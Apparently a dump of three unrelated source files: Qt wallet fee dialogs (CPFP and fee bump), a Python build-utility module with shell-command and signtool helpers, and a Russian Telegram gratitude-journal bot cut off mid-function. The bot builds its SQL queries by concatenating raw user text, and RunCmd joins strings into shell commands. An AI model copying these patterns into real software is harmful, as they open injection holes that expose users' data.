w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_fee = self.wallet.get_tx_fee(parent_tx)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
fee = self.wallet.get_tx_fee(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, config=self.config)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
utility_functions.py | ##
# Utility Functions to support re-use in python scripts.
# Includes functions for running external commands, etc
#
# Copyright (c) Microsoft Corporation
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
##
import re
import os
import logging
import datetime
import time
import shutil
import threading
import subprocess
import sys
import inspect
import platform
import importlib
from collections import namedtuple
####
# Helper to allow Enum type to be used which allows better code readability
#
# ref: http://stackoverflow.com/questions/36932/how-can-i-represent-an-enum-in-python
####
class Enum(tuple):
__getattr__ = tuple.index
####
# Class to support running commands from the shell in a python environment.
# Don't use directly.
#
# PropagatingThread copied from sample here:
# https://stackoverflow.com/questions/2829329/catch-a-threads-exception-in-the-caller-thread-in-python
####
class PropagatingThread(threading.Thread):
def run(self):
self.exc = None
try:
if hasattr(self, '_Thread__target'):
# Thread uses name mangling prior to Python 3.
self.ret = self._Thread__target(*self._Thread__args, **self._Thread__kwargs)
else:
self.ret = self._target(*self._args, **self._kwargs)
except BaseException as e:
self.exc = e
def join(self, timeout=None):
super(PropagatingThread, self).join()
if self.exc:
raise self.exc
return self.ret
####
# Helper functions for running commands from the shell in python environment
# Don't use directly
#
# process output stream and write to log.
# part of the threading pattern.
#
# http://stackoverflow.com/questions/19423008/logged-subprocess-communicate
####
def reader(filepath, outstream, stream, logging_level=logging.INFO):
f = None
# open file if caller provided path
if(filepath):
f = open(filepath, "w")
while True:
s = stream.readline().decode()
if not s:
break
if(f is not None):
# write to file if caller provided file
f.write(s)
if(outstream is not None):
# write to stream object if caller provided object
outstream.write(s)
logging.log(logging_level, s.rstrip())
stream.close()
if(f is not None):
f.close()
####
# Returns a namedtuple containing information about host machine.
#
# @return namedtuple Host(os=OS Type, arch=System Architecture, bit=Highest Order Bit)
####
def GetHostInfo():
Host = namedtuple('Host', 'os arch bit')
host_info = platform.uname()
os = host_info.system
processor_info = host_info.machine
arch = None
bit = None
if ("x86" in processor_info.lower()) or ("AMD" in processor_info.upper()) or ("INTEL" in processor_info.upper()):
arch = "x86"
elif ("ARM" in processor_info.upper()) or ("AARCH" in processor_info.upper()):
arch = "ARM"
if "32" in processor_info:
bit = "32"
elif "64" in processor_info:
bit = "64"
if (arch is None) or (bit is None):
raise EnvironmentError("Host info could not be parsed: {0}".format(str(host_info)))
return Host(os=os, arch=arch, bit=bit)
####
# This is a mixing to do timing on a function. Use it like this:
#
# @timing
# def function_i_want_to_time():
# ...
####
def timing(f):
def wrap(*args):
time1 = time.time()
ret = f(*args)
time2 = time.time()
logging.debug('{:s} function took {:.3f} ms'.format(f.__name__, (time2 - time1) * 1000.0))
return ret
return wrap
####
# Run a shell command and print the output to the log file
# This is the public function that should be used to run commands from the shell in python environment
# @param cmd - command being run, either quoted or not quoted
# @param parameters - parameters string taken as is
# @param capture - boolean to determine if caller wants the output captured in any format.
# @param workingdir - path to set to the working directory before running the command.
# @param outfile - capture output to file of given path.
# @param outstream - capture output to a stream.
# @param environ - shell environment variables dictionary that replaces the one inherited from the
# current process.
# @param logging_level - log level to log output at. Default is INFO
# @param raise_exception_on_nonzero - Setting to true causes exception to be raised if the cmd
# return code is not zero.
#
# @return returncode of called cmd
####
def RunCmd(cmd, parameters, capture=True, workingdir=None, outfile=None, outstream=None, environ=None,
logging_level=logging.INFO, raise_exception_on_nonzero=False):
cmd = cmd.strip('"\'')
if " " in cmd:
cmd = '"' + cmd + '"'
if parameters is not None:
parameters = parameters.strip()
cmd += " " + parameters
starttime = datetime.datetime.now()
logging.log(logging_level, "Cmd to run is: " + cmd)
logging.log(logging_level, "------------------------------------------------")
logging.log(logging_level, "--------------Cmd Output Starting---------------")
logging.log(logging_level, "------------------------------------------------")
c = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=workingdir, shell=True, env=environ)
if(capture):
thread = PropagatingThread(target=reader, args=(outfile, outstream, c.stdout, logging_level))
thread.start()
c.wait()
thread.join()
else:
c.wait()
endtime = datetime.datetime.now()
delta = endtime - starttime
endtime_str = "{0[0]:02}:{0[1]:02}".format(divmod(delta.seconds, 60))
logging.log(logging_level, "------------------------------------------------")
logging.log(logging_level, "--------------Cmd Output Finished---------------")
logging.log(logging_level, "--------- Running Time (mm:ss): " + endtime_str + " ----------")
logging.log(logging_level, "------------------------------------------------")
if raise_exception_on_nonzero and c.returncode != 0:
raise Exception("{0} failed with error code: {1}".format(cmd, c.returncode))
return c.returncode
####
# Run a python script and print the output to the log file
# This is the public function that should be used to execute python scripts from the shell in python environment.
# The python script will be located using the path as if it was an executable.
#
# @param cmd - cmd string to run including parameters
# @param capture - boolean to determine if caller wants the output captured in any format.
# @param workingdir - path to set to the working directory before running the command.
# @param outfile - capture output to file of given path.
# @param outstream - capture output to a stream.
# @param environ - shell environment variables dictionary that replaces the one inherited from the
# current process.
#
# @return returncode of called cmd
####
def RunPythonScript(pythonfile, params, capture=True, workingdir=None, outfile=None, outstream=None,
environ=None, logging_level=logging.INFO, raise_exception_on_nonzero=False):
# locate python file on path
pythonfile.strip('"\'')
if " " in pythonfile:
pythonfile = '"' + pythonfile + '"'
params.strip()
logging.debug("RunPythonScript: {0} {1}".format(pythonfile, params))
if(os.path.isabs(pythonfile)):
logging.debug("Python Script was given as absolute path: %s" % pythonfile)
elif(os.path.isfile(os.path.join(os.getcwd(), pythonfile))):
pythonfile = os.path.join(os.getcwd(), pythonfile)
logging.debug("Python Script was given as relative path: %s" % pythonfile)
else:
# loop thru path environment variable
for a in os.getenv("PATH").split(os.pathsep):
a = os.path.normpath(a)
if os.path.isfile(os.path.join(a, pythonfile)):
pythonfile = os.path.join(a, pythonfile)
logging.debug("Python Script was found on the path: %s" % pythonfile)
break
params = pythonfile + " " + params
return RunCmd(sys.executable, params, capture=capture, workingdir=workingdir, outfile=outfile,
outstream=outstream, environ=environ, logging_level=logging_level,
raise_exception_on_nonzero=raise_exception_on_nonzero)
####
# Locally Sign input file using Windows SDK signtool. This will use a local Pfx file.
# WARNING!!! : This should not be used for production signing as that process should follow stronger
# security practices (HSM / smart cards / etc)
#
# Signing is in format specified by UEFI authentacted variables
####
def DetachedSignWithSignTool(SignToolPath, ToSignFilePath, SignatureOutputFile, PfxFilePath,
PfxPass=None, Oid="1.2.840.113549.1.7.2", Eku=None):
# check signtool path
if not os.path.exists(SignToolPath):
logging.error("Path to signtool invalid. %s" % SignToolPath)
return -1
# Adjust for spaces in the path (when calling the command).
if " " in SignToolPath:
SignToolPath = '"' + SignToolPath + '"'
OutputDir = os.path.dirname(SignatureOutputFile)
# Signtool docs https://docs.microsoft.com/en-us/dotnet/framework/tools/signtool-exe
# Signtool parameters from
# https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/secure-boot-key-generation-and-signing-using-hsm--example # noqa: E501
# Search for "Secure Boot Key Generation and Signing Using HSM"
params = 'sign /fd sha256 /p7ce DetachedSignedData /p7co ' + Oid + ' /p7 "' + \
OutputDir + '" /f "' + PfxFilePath + '"'
if Eku is not None:
params += ' /u ' + Eku
if PfxPass is not None:
# add password if set
params = params + ' /p ' + PfxPass
params = params + ' /debug /v "' + ToSignFilePath + '" '
ret = RunCmd(SignToolPath, params)
if(ret != 0):
logging.error("Signtool failed %d" % ret)
return ret
signedfile = os.path.join(OutputDir, os.path.basename(ToSignFilePath) + ".p7")
if(not os.path.isfile(signedfile)):
raise Exception("Output file doesn't exist %s" % signedfile)
shutil.move(signedfile, SignatureOutputFile)
return ret
####
# Locally Sign input file using Windows SDK signtool. This will use a local Pfx file.
# WARNING!!! : This should not be used for production signing as that process should follow
# stronger security practices (HSM / smart cards / etc)
#
# Signing is catalog format which is an attached signature
####
def CatalogSignWithSignTool(SignToolPath, ToSignFilePath, PfxFilePath, PfxPass=None):
# check signtool path
if not os.path.exists(SignToolPath):
logging.error("Path to signtool invalid. %s" % SignToolPath)
return -1
# Adjust for spaces in the path (when calling the command).
if " " in SignToolPath:
SignToolPath = '"' + SignToolPath + '"'
OutputDir = os.path.dirname(ToSignFilePath)
# Signtool docs https://docs.microsoft.com/en-us/dotnet/framework/tools/signtool-exe
# todo: link to catalog signing documentation
params = "sign /a /fd SHA256 /f " + PfxFilePath
if PfxPass is not None:
# add password if set
params = params + ' /p ' + PfxPass
params = params + ' /debug /v "' + ToSignFilePath + '" '
ret = RunCmd(SignToolPath, params, workingdir=OutputDir)
if(ret != 0):
logging.error("Signtool failed %d" % ret)
return ret
###
# Function to print a byte list as hex and optionally output ascii as well as
# offset within the buffer
###
def PrintByteList(ByteList, IncludeAscii=True, IncludeOffset=True, IncludeHexSep=True, OffsetStart=0):
Ascii = ""
for index in range(len(ByteList)):
# Start of New Line
if(index % 16 == 0):
if(IncludeOffset):
print("0x%04X -" % (index + OffsetStart), end='')
# Midpoint of a Line
if(index % 16 == 8):
if(IncludeHexSep):
print(" -", end='')
# Print As Hex Byte
print(" 0x%02X" % ByteList[index], end='')
# Prepare to Print As Ascii
if(ByteList[index] < 0x20) or (ByteList[index] > 0x7E):
Ascii += "."
else:
Ascii += ("%c" % ByteList[index])
# End of Line
if(index % 16 == 15):
if(IncludeAscii):
print(" %s" % Ascii, end='')
Ascii = ""
print("")
# Done - Lets check if we have partial
if(index % 16 != 15):
# Lets print any partial line of ascii
if(IncludeAscii) and (Ascii != ""):
# Pad out to the correct spot
while(index % 16 != 15):
print(" ", end='')
if(index % 16 == 7): # account for the - symbol in the hex dump
if(IncludeOffset):
print(" ", end='')
index += 1
# print the ascii partial line
print(" %s" % Ascii, end='')
# print a single newline so that next print will be on new line
print("")
# Simplified Comparison Function borrowed from StackOverflow...
# https://stackoverflow.com/questions/1714027/version-number-comparison
# With Python 3.0 help from:
# https://docs.python.org/3.0/whatsnew/3.0.html#ordering-comparisons
def version_compare(version1, version2):
def normalize(v):
return [int(x) for x in re.sub(r'(\.0+)*$', '', v).split(".")]
(a, b) = (normalize(version1), normalize(version2))
return (a > b) - (a < b)
def import_module_by_file_name(module_file_path):
''' Standard method of importing a Python file. Expecting absolute path. '''
module_name = os.path.basename(module_file_path)
spec = importlib.util.spec_from_file_location(module_name, module_file_path)
if spec is None:
raise RuntimeError(f"Expected module file named {module_file_path}")
ImportedModule = importlib.util.module_from_spec(spec)
spec.loader.exec_module(ImportedModule)
return ImportedModule
def locate_class_in_module(Module, DesiredClass):
'''
Given a module and a class, this function will return the subclass of DesiredClass found in Module.
It gives preference to classes that are defined in the module itself.
This means that if you have an import that subclasses DesiredClass, it will be picked unless
there is a class defined in the module that subclasses DesiredClass.
In this hypothetical class hierarchy, GrandChildClass would be picked
-------------- ------------ -----------------
|DesiredClass| -> |ChildClass| -> |GrandChildClass|
-------------- ------------ -----------------
'''
DesiredClassInstance = None
# Pull out the contents of the module that was provided
module_contents = dir(Module)
# Filter through the Module, we're only looking for classes.
classList = [getattr(Module, obj) for obj in module_contents
if inspect.isclass(getattr(Module, obj))]
for _class in classList:
# Classes that the module import show up in this list too so we need
# to make sure it's an INSTANCE of DesiredClass, not DesiredClass itself!
# if multiple instances are found in the same class hierarchy, pick the
# most specific one. If multiple instances are found belonging to different
# class hierarchies, raise an error.
if _class is not DesiredClass and issubclass(_class, DesiredClass):
if (DesiredClassInstance is None) or issubclass(_class, DesiredClassInstance):
DesiredClassInstance = _class
elif not issubclass(DesiredClassInstance, _class):
raise RuntimeError(f"Multiple instances were found:\n\t{DesiredClassInstance}\n\t{_class}")
return DesiredClassInstance
if __name__ == '__main__':
pass
# Test code for printing a byte buffer
# a = [0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3a, 0x3b, 0x3c, 0x3d]
# index = 0x55
# while(index < 0x65):
# a.append(index)
# PrintByteList(a)
# index += 1
|
bot.py | # -*- coding: utf-8 -*-
import random
from datetime import datetime
from threading import Thread
from time import sleep
import schedule
import telebot
import config
import mybotdata as bdat
import mybotfunctions as bfunc
import withstickers as stick
from metrics import update_number_of_users
from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton
bot = telebot.TeleBot(config.token, skip_pending=True)
def update_user_data(message):
bfunc.ex_command(
"update bot_users set username = '@" + str(message.from_user.username) + "' where chat_id = '" + str(
message.chat.id) + "';")
@bot.message_handler(content_types=['video_note'])
def get_VideoNote(message):
file_id = message.video_note.file_id
#print(file_id)
#bot.send_video_note(message.chat.id, file_id)
if str(message.chat.id) in bdat.authors_id:
bfunc.ex_command("INSERT INTO video_notes (date, file_id, chat_id, `trigger`) VALUES (CURRENT_TIMESTAMP,'" + str(file_id) + "', '" + str(message.chat.id) + "', 1);")
@bot.message_handler(content_types=['voice'])
def get_voice(message):
file_id = message.voice.file_id
if str(message.chat.id) == bdat.authors_id[0]:
bfunc.ex_command("INSERT INTO voices (date, file_id, chat_id) VALUES (CURRENT_TIMESTAMP,'" + str(file_id) + "', '" + str(message.chat.id) + "');")
else:
bot.send_message(message.chat.id, 'Спасибо, мы приняли ваше голосовое сообщение, оно будет рассмотрено модератором.')
markup = InlineKeyboardMarkup()
markup.row_width = 2
markup.add(InlineKeyboardButton("Принять", callback_data="cb_yes_first", one_time_keyboard=True),
InlineKeyboardButton("Отклонить", callback_data="cb_no", one_time_keyboard=True))
#bot.send_voice(bdat.authors_id[0], file_id, caption=f'{message.chat.id}', reply_markup=markup)
bot.send_voice(bdat.authors_id[1], file_id, caption=f'{message.chat.id}', reply_markup=markup)
@bot.callback_query_handler(func=lambda call: True)
def callback_query(call):
if call.data == "cb_yes_first":
new_markup = InlineKeyboardMarkup()
new_markup.row_width = 2
new_markup.add(InlineKeyboardButton("Принять войс", callback_data="cb_yes", one_time_keyboard=True),
InlineKeyboardButton("Отклонить войс (удалить)", callback_data="cb_no", one_time_keyboard=True))
bot.send_voice(bdat.authors_id[0], call.message.voice.file_id, caption=call.message.caption, reply_markup=new_markup)
bot.answer_callback_query(call.id, "Войс добавлен в базу данных")
bot.edit_message_reply_markup(chat_id=call.message.chat.id, message_id=call.message.id, reply_markup=None)
elif call.data == "cb_yes":
bfunc.ex_command("INSERT INTO voices (date, file_id, chat_id, `trigger`) VALUES (CURRENT_TIMESTAMP,'" + str(
call.message.voice.file_id) + "', '" + str(call.message.caption) + "', 1);")
bot.answer_callback_query(call.id, "Войс добавлен в базу данных")
bot.send_message(call.message.caption,
'Ваше голосовое сообщение прошло модерацию. Теперь его смогут прослушать другие пользователи, когда обратятся за вдохновением.')
bot.edit_message_reply_markup(chat_id=call.message.chat.id, message_id=call.message.id, reply_markup=None)
elif call.data == "cb_no":
bot.answer_callback_query(call.id, "Войс проигнорирован")
bot.edit_message_reply_markup(chat_id=call.message.chat.id, message_id=call.message.id, reply_markup=None)
elif call.data == 'cb_voice':
bot.answer_callback_query(call.id, "Буду отправлять голосовыми сообщениями")
bfunc.ex_command(
"update bot_users set achieve_method = '" + "voice" + "' where chat_id = '" + str(call.message.chat.id) + "';")
bot.edit_message_reply_markup(chat_id=call.message.chat.id, message_id=call.message.id, reply_markup=None)
elif call.data == 'cb_text':
bot.answer_callback_query(call.id, "Буду отправлять текстовыми сообщениями")
bfunc.ex_command(
"update bot_users set achieve_method = '" + "text" + "' where chat_id = '" + str(call.message.chat.id) + "';")
bot.edit_message_reply_markup(chat_id=call.message.chat.id, message_id=call.message.id, reply_markup=None)
elif call.data == 'cb_video_note':
bot.answer_callback_query(call.id, "Буду отправлять круглыми видеосообщениями")
bfunc.ex_command(
"update bot_users set achieve_method = '" + "video_note" + "' where chat_id = '" + str(call.message.chat.id) + "';")
bot.edit_message_reply_markup(chat_id=call.message.chat.id, message_id=call.message.id, reply_markup=None)
if call.data == "cb_insp_text_yes":
bfunc.ex_command("INSERT INTO texts (date, text, chat_id, `trigger`) VALUES (CURRENT_TIMESTAMP,'" + call.message.text + "', '" + str(call.message.chat.id) + "', 1);")
bot.answer_callback_query(call.id, "Текст добавлен")
bot.edit_message_reply_markup(chat_id=call.message.chat.id, message_id=call.message.id, reply_markup=None)
#bot.send_message(call.message.caption, 'Ваше текстовое сообщение прошло модерацию. Теперь его смогут прослушать другие пользователи, когда обратятся за вдохновением.')
elif call.data == "cb_insp_text_no":
bot.answer_callback_query(call.id, "Текст проигнорирован (все ок, больше жать не надо)")
bot.edit_message_reply_markup(chat_id=call.message.chat.id, message_id=call.message.id, reply_markup=None)
@bot.message_handler(commands=['set_notification', 'stop', 'menu', 'settings'])
def set_notification(message):
update_user_data(message)
bot.send_message(message.chat.id, 'Во сколько тебе напомнить о практике благодарности? (по часовому поясу MSK)',
reply_markup=bdat.many_moments)
bot.register_next_step_handler(message, set_new_time)
@bot.message_handler(commands=['start', 'help'])
def welcome_message(message):
if message.chat.id in bfunc.to_id_list(bfunc.data_command("select chat_id from bot_users")):
bot.send_message(message.chat.id, "Вы уже прошли регистрацию в боте. Ты в главном меню",
reply_markup=bdat.main_menu_buttons)
else:
update_number_of_users()
bfunc.ex_command(
"insert into bot_users(chat_id, date) values('" + str(message.chat.id) + "', CURRENT_TIMESTAMP)")
update_user_data(message)
bot.send_message(message.chat.id, bdat.welc_text, reply_markup=bdat.yes_no)
bot.register_next_step_handler(message, _2)
def _2(message):
if message.text == 'Да':
bot.send_message(message.chat.id,
'Отлично! Используя практику благодарности, ты можешь стать позитивнее и счастливее. Так думают не только психологи, но и ученые.',
reply_markup=bdat.aga)
bot.register_next_step_handler(message, _1_3)
elif message.text == 'Нет':
bot.send_message(message.chat.id,
'Практика благодарности — работающий способ улучшить своё благополучие и качество жизни. Она помогает сформировать привычку лучше относиться к себе и замечать больше хорошего.\n\n Кстати, практика благодарности используется в научно доказанной когнитивно-поведенческой терапии!',
reply_markup=bdat.what_to_do)
bot.register_next_step_handler(message, _2_3)
else:
bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
bot.register_next_step_handler(message, _2)
def _1_3(message):
bot.send_message(message.chat.id,
'Сейчас приступим! Но для начала мне нужно чуть больше узнать о тебе. Как я могу к тебе обращаться? (Напиши имя)',
reply_markup=bdat.empty)
bot.register_next_step_handler(message, your_name)
def _2_3(message):
bot.send_message(message.chat.id,
'Все очень просто! Тебе нужно каждый день записывать что-то, за что ты ощущаешь благодарность.')
bot.send_message(message.chat.id,
'Подойдут любые штуки, даже самые небольшие. Можно поблагодарить себя за вкусный обед, хорошую работу, прогулку, встречу с другом. Даже если что-то не получилось, важно поблагодарить себя за эту попытку.',
reply_markup=bdat.lets_try)
bot.register_next_step_handler(message, _1_3)
def your_name(message):
name = message.text
bfunc.ex_command("update bot_users set nickname = '" + name + "' where chat_id = '" + str(message.chat.id) + "';")
bot.send_message(message.chat.id,
"Хорошо, " + name + "! Как ты хочешь говорить о своих благодарностях?\n\n«Я благодарен» или «Я благодарна»",
reply_markup=bdat.gender)
bot.register_next_step_handler(message, your_gender)
def your_gender(message):
if message.text == 'Я благодарен':
bfunc.ex_command("update bot_users set gender = 'male' where chat_id = '" + str(message.chat.id) + "';")
elif message.text == 'Я благодарна':
bfunc.ex_command("update bot_users set gender = 'female' where chat_id = '" + str(message.chat.id) + "';")
else:
bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
bot.register_next_step_handler(message, your_gender)
bot.send_message(message.chat.id, bfunc.gender_text(message.chat.id, 'Ура! Ты готов записать первую благодарность?',
'Ура! Ты готова записать первую благодарность?'),
reply_markup=bdat.readiness)
bot.register_next_step_handler(message, is_ready)
def is_ready(message):
if message.text == 'Да!':
bot.send_message(message.chat.id,
bfunc.gender_text(message.chat.id, bdat.text_write_grate_male, bdat.text_write_grate_female),
reply_markup=bdat.empty)
bot.register_next_step_handler(message, write_first_grate)
elif message.text == 'Не знаю, что написать':
ready_to_feel_keyb = telebot.types.ReplyKeyboardMarkup(True).row(
bfunc.gender_text(message.chat.id, 'Готов чувствовать благодарность!',
'Готова чувствовать благодарность!')).row('Все еще ничего не приходит на ум')
bot.send_message(message.chat.id,
bfunc.gender_text(message.chat.id, bdat.text_feel_1_male, bdat.text_feel_1_female),
reply_markup=ready_to_feel_keyb)
bot.register_next_step_handler(message, feel_grate_1)
else:
bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
bot.register_next_step_handler(message, is_ready)
def feel_grate_1(message):
if message.text == 'Готов чувствовать благодарность!' or message.text == 'Готова чувствовать благодарность!':
bot.send_message(message.chat.id,
bfunc.gender_text(message.chat.id, bdat.text_write_grate_male, bdat.text_write_grate_female),
reply_markup=bdat.empty)
bot.register_next_step_handler(message, write_first_grate)
if message.text == 'Все еще ничего не приходит на ум':
bot.send_message(message.chat.id, bdat.text_feel_2, reply_markup=bdat.run)
bot.register_next_step_handler(message, feel_grate_2)
def feel_grate_2(message):
bot.send_message(message.chat.id,
bfunc.gender_text(message.chat.id, bdat.text_write_grate_male, bdat.text_write_grate_female),
reply_markup=bdat.empty)
bot.register_next_step_handler(message, write_first_grate)
def write_first_grate(message):
text = message.text
try:
bfunc.ex_command("INSERT INTO notes (date, note, chat_id) VALUES (CURRENT_TIMESTAMP,'" + text + "', '" + str(
message.chat.id) + "');")
bot.send_message(message.chat.id,
bfunc.gender_text(message.chat.id, bdat.awesome_text_male, bdat.awesome_text_female),
reply_markup=bdat.result_feel)
bot.register_next_step_handler(message, awesome)
except Exception as ex:
bot.send_message(message.chat.id, "Непредвиденная ошибка, попробуйте добавить благодарность снова.")
bot.register_next_step_handler(message, write_first_grate)
print(type(ex))
def awesome(message):
if message.text == "Да, чувствую!":
bot.send_message(message.chat.id,
"Здорово! Важно замечать, как отношение к себе и своим успехам по чуть-чуть меняется.")
elif message.text == "Пока нет :(":
bot.send_message(message.chat.id,
"Конечно, изменения происходят не так быстро. Но благодаря регулярной практике ты обязательно начнешь больше ценить себя, свои успехи и особенности")
else:
bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
bot.register_next_step_handler(message, awesome)
bot.send_message(message.chat.id,
"Когда записываешь благодарность, старайся поглубже в нее погрузиться и прочувствовать ее.",
reply_markup=bdat.how_1)
bot.register_next_step_handler(message, imaginate)
def imaginate(message):
bot.send_message(message.chat.id,
"Представь, что друг сделал для тебя что-то очень хорошее, и ты чувствуешь тепло, радость, нежность. Только вот сейчас этот друг для себя — ты сам.",
reply_markup=stick.cute)
bot.register_next_step_handler(message, dont_forget)
def dont_forget(message):
bot.send_message(message.chat.id,
"Не забывай пересматривать старые благодарности и заново проживать их — так радости будет еще больше.",
reply_markup=bdat.safety)
bot.register_next_step_handler(message, safety_exist)
def safety_exist(message):
bot.send_message(message.chat.id,
"Твои благодарности будут храниться в зашифрованной базе данных. Если захочешь, сможешь в любой момент удалить все благодарности — кнопка для этого будет в настройках.",
reply_markup=bdat.exellent)
bot.register_next_step_handler(message, preoffer_again)
def preoffer_again(message):
bot.send_message(message.chat.id, "Хочешь записать еще благодарность?", reply_markup=bdat.grate_again)
bot.register_next_step_handler(message, offer_again)
def offer_again(message):
